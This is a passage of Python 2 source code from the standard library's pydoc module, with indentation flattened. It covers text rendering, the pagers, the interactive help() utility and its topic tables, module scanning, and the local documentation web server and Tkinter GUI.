thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
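# Example of locate() (illustrative, not part of the original source):
# locate('os.path.join') imports os.path as needed and returns the join
# function, while locate('no.such.thing') simply returns None.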
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
